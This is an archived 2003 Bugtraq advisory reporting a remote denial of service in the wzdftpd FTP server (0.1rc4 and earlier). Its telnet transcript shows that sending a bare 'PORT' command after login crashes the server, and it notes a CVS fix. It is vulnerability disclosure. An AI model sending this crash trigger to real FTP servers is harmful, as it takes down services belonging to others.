lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030627211617.736436f8.bogorodskiy@inbox.ru>
Date: Fri, 27 Jun 2003 21:16:17 +0400
From: Roman Bogorodskiy <bogorodskiy@...ox.ru>
To: bugtraq@...urityfocus.com
Subject: wzdftpd remote DoS


Title: wzdftpd remote DoS
Affected: wzdftpd <= 0.1rc4
URL: http://www.wzdftpd.net
Risk: High
Exploitable: Yes
Remote: Yes
Date: June, 27 2003

Overview: 
"A portable, modular and efficient ftp server, supporting SSL,
winsock, multithreaded, modules ,externals scripts. unix-like
permissions+acls, virtual users/groups, security, speed, bandwith
limitation (user,group,global), group admins, per command auth"

Description:
wzdftpd crashes after sending command "PORT" w/out args. 

$> telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
$> telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

So, we see server is down.
Jun 11 23:00:33 fbd kernel: pid 7149 (lt-wzdftpd), uid 0: exited on signal 11 (core dumped)

This bug is fixed on June, 12 in a CVS version. 

-Roman Bogorodskiy [Novel]


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ